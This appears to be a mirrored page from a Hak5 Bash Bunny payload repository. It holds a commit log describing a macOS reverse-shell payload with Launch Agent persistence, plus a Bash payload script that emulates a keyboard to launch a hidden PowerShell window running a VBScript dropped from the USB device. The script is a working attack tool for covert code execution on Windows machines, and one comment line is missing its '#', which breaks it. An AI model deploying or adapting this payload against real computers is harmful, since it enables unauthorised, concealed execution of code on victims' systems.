mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
750d384df7
* Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Fixed additional MacReverseShell * Added readme.md files * Added readme.md files * Added readme.md * Added readme.md files * Added readme.md files * Updated for firmware 1.1 * Updated for firmware 1.1 * Added ThemeChanger and updated for firmware 1.1 * Updated readme.md * Updated for firmware 1.1 - using RUN command * Fixed issues with the new RUN - reverted * Fixed a few script problems * removed binary and updated readme.md * added a check for themepack * edited themechanger readme * updated readme.md and version
46 lines
1.4 KiB
Bash
46 lines
1.4 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: RAZ_VBScript
|
|
# Author: RalphyZ
|
|
# Version: 1.1
|
|
# Target: Windows 7+
|
|
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
|
#
|
|
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
|
#
|
|
# Colors:
|
|
# | Status | Color | Description |
|
|
# | ---------- | ------------------------------| ------------------------------------------------ |
|
|
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
|
# | FAIL | Red slow blink | Could not find the a.vbs script |
|
|
# | ATTACK | Yellow single blink | Running the VBScript |
|
|
# | FINISH | Green blink followed by SOLID | Script is finished |
|
|
|
|
# Magenta solid
|
|
LED SETUP
|
|
|
|
# Set the attack mode
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# Get the switch position
|
|
GET SWITCH_POSITION
|
|
|
|
Check if a.vbs is present
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
|
LED FAIL
|
|
exit 1
|
|
fi
|
|
|
|
# Start the attack - yellow single blink
|
|
LED ATTACK
|
|
|
|
# Run the VBScript
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
|
|
QUACK ENTER
|
|
|
|
|
|
# Green 1000ms VERYFAST blink followed by SOLID
|
|
LED FINISH
|
|
exit 0 |